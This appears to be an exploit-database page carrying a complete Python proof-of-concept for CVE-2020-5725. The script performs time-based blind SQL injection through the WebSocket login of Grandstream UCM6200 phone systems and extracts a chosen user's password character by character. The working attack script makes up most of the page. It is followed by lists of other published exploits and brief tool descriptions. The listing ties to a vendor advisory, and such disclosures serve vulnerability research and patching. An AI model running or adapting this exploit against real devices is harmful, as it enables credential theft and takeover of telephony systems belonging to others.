Search for hundreds of thousands of exploits

"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection"

Author

Exploit author

"Jacob Baines"

Platform

Exploit platform

hardware

Release date

Exploit published date

2020-03-31

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
# Exploit Title: Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection
# Date: 2020-03-30
# Exploit Author: Jacob Baines
# Vendor Homepage: http://www.grandstream.com/
# Software Link: http://www.grandstream.com/support/firmware/ucm62xx-official-firmware
# Version: 1.0.20.20 and below
# Tested on: Grandstream UCM6202 1.0.20.20
# CVE : CVE-2020-5725
# Grandstream UCM6200 Series WebSocket 1.0.20.20 SQL Injection Password Disclosure via Login (time based)
# Advisory: https://www.tenable.com/security/research/tra-2020-17
# Sample output:
#
# albinolobster@ubuntu:~$ python3 websockify_login_injection.py --rhost 192.168.2.1 --user lolwat
# [+] Password length is 9
# [+] Discovering password...
# LabPass1%
# [+] Done! The password is LabPass1%

import sys
import ssl
import time
import asyncio
import argparse
import websockets

async def password_guess(ip, port, username):

    # the path to exploit
    uri = 'wss://' + ip + ':' + str(8089) + '/websockify'

    # no ssl verification
    ssl_context = ssl.SSLContext()
    ssl_context.verify_mode = ssl.CERT_NONE
    ssl_context.check_hostname = False

    # determine the length of the password. The timeout is 10 seconds...
probably
    # way too long but whatever.
    length = 0
    while length < 100:
        async with websockets.connect(uri, ssl=ssl_context) as websocket:
            start = time.time()
            login =
'{"type":"request","message":{"transactionid":"123456789zxa","action":"login","username":"'
+ username + '\' AND LENGTH(user_password)==' + str(length) + ' AND
88=LIKE(\'ABCDEFG\',UPPER(HEX(RANDOMBLOB(500000000/2)))) or
\'1\'=\'2","token":"lolwat"}}'
            await websocket.send(login)
            response = await websocket.recv()

            if (time.time() - start) < 5:
                length = length + 1
                continue
            else:
                break

    # if we hit max password length than we've done something wrong
    if (length == 100):
        print('[+] Couldn\'t determine the passwords length.')
        sys.exit(1)

    print('[+] Password length is', length)
    print('[+] Discovering password...')

    # Now that we know the password length, just guess each password byte
until
    # we've reached the full length. Again timeout set to 10 seconds.
    password = ''
    while len(password) < length:
        value = 0x20
        while value < 0x80:
            if value == 0x22 or value == 0x5c:
                temp_pass = password + '\\'
                temp_pass = temp_pass + chr(value)
            else:
                temp_pass = password + chr(value)

            temp_pass_len = len(temp_pass)

            start = time.time()

            async with websockets.connect(uri, ssl=ssl_context) as
websocket:
                challenge =
'{"type":"request","message":{"transactionid":"123456789zxa","action":"login","username":"'
+ username + '\' AND user_password LIKE \'' + temp_pass +'%\' AND
substr(user_password,1,' + str(temp_pass_len) + ') = \'' + temp_pass + '\'
AND 88=LIKE(\'ABCDEFG\',UPPER(HEX(RANDOMBLOB(500000000/2)))) or
\'1\'=\'2","token":"lolwat"}}'
                await websocket.send(challenge)
                response = await websocket.recv()

            if (time.time() - start) < 5:
                value = value + 1
                continue
            else:
                print('\r' + temp_pass, end='')
                password = temp_pass
                break

        if value == 0x80:
            print('')
            print('[-] Failed to determine the password.')
            sys.exit(1)

    print('')
    print('[+] Done! The password is', password)

top_parser = argparse.ArgumentParser(description='')
top_parser.add_argument('--rhost', action="store", dest="rhost",
required=True, help="The remote host to connect to")
top_parser.add_argument('--rport', action="store", dest="rport", type=int,
help="The remote port to connect to", default=8089)
top_parser.add_argument('--user', action="store", dest="user",
required=True, help="The user to brute force")
args = top_parser.parse_args()

asyncio.get_event_loop().run_until_complete(password_guess(args.rhost,
args.rport, args.user))
Release DateTitleTypePlatformAuthor
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"osTicket 1.14.1 - 'Saved Search' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
2020-05-27"Kuicms PHP EE 2.0 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-27"Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting"webappsphp"that faceless coder"
Release DateTitleTypePlatformAuthor
2020-04-17"Cisco IP Phone 11.7 - Denial of service (PoC)"webappshardware"Jacob Baines"
2020-04-08"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)"webappshardware"Jacob Baines"
2020-03-31"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-24"UCM6202 1.0.18.13 - Remote Command Injection"webappshardware"Jacob Baines"
2019-10-31"MikroTik RouterOS 6.45.6 - DNS Cache Poisoning"remotehardware"Jacob Baines"
2019-07-30"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming"webappshardware"Jacob Baines"
2019-05-03"Crestron AM/Barco wePresent WiPG/Extron ShareLink/Teq AV IT/SHARP PN-L703WA/Optoma WPS-Pro/Blackbox HD WPS/InFocus LiteShow - Remote Command Injection"webappshardware"Jacob Baines"
2019-02-21"MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass"remotehardware"Jacob Baines"
2019-02-11"Indusoft Web Studio 8.1 SP2 - Remote Code Execution"remotemultiple"Jacob Baines"
2018-12-21"Netatalk < 3.1.12 - Authentication Bypass"remotemultiple"Jacob Baines"
2018-10-10"MicroTik RouterOS < 6.43rc3 - Remote Root"remotehardware"Jacob Baines"
2018-09-18"NUUO NVRMini2 3.8 - 'cgi_system' Buffer Overflow (Enable Telnet)"remotehardware"Jacob Baines"
2017-06-14"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution"remotehardware"Jacob Baines"
2016-10-20"MiCasaVerde VeraLite - Remote Code Execution"remotehardware"Jacob Baines"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48271/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.